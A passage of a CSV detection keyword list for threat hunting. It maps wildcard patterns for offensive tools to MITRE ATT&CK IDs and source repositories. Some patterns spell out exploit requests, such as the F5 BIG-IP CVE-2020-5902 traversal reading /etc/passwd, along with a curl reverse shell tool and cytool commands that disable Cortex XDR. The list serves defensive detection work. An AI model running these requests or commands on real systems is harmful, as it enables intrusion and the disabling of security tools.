- TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl --output *http*/tomcatwar.jsp?*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*curl*/tmp/exploit-dirty-pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*custom_payload_generator.*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" +"*CustomKeyboardLayoutPersistence*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" +"*cut -d: -f1 /etc/passwd*","greyware_tool_keyword","cut","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*CVE-*.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.c*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.com*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.cpp*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.git*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.py*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE-*.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" +"*CVE*/exploit.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*CVE_*_exploited.txt*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" +"*cve_2_MSF_exploit_Mapping*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*CVE-2020-5902-Scanner/scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" +"*CVE-2021-34527.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cve-20220-26809_exploit.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve-2022-23131.py *","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" +"*cve-2022-26809-scanVuln.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*CVE-2022-30190-follina-Office-MSDT-Fixed*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*CVE-2023-20887.git*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" +"*cve-2023-21554.nse*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,, +"*CVE-2023-23397.ps1*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"*cvescanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*cyberark/ACLight*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*cyberark/kubesploit*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*cyberark/PipeViewer*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*cypheroth -u neo4j -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cytool.exe event_collection disable*","greyware_tool_keyword","cytool","Disables event collection","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*cytool.exe protect disable*","greyware_tool_keyword","cytool","Disables protection on Cortex XDR files processes registry and services","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*cytool.exe runtime disable*","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*cytool.exe startup disable*","greyware_tool_keyword","cytool","Disables the cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*-d kali-linux *","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*D00MFist/Mystikal*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*D00Movenok/HTMLSmuggler*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 